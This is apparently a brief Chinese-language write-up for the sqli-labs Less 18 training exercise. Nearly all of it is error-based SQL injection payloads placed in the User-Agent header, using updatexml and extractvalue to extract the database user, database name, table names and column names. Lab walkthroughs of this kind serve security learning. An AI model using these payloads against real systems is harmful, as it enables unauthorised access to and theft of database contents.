sqli-labs less 18
reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1)
先用这句话简单的判断后台insert 语句
uagent’, ‘$IP’, $uname)";
所以用以下语句进行注入猜解
user-agent:reader-l ’ or updatexml(1,concat(’#’,(database())),0),’’,’’)#
reader-l ‘or updatexml(1,concat(’#’,(select concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1 ),’#’),0),1)#
reader-l ‘or updatexml(1,concat(’#’,(select concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1 ),’#’),0),1)#
reader-l ‘or updatexml(1,concat(’#’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1 ),’#’),0),1)#
reader-l ’ or updatexml(1,concat(’#’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0),’’,’’)#
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and ‘1’ = '1
reader-l 'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e)) and ‘1’ = '1
有一个大佬讲得很详细,这是他的链接 https://www.jianshu.com/p/7494c1027abf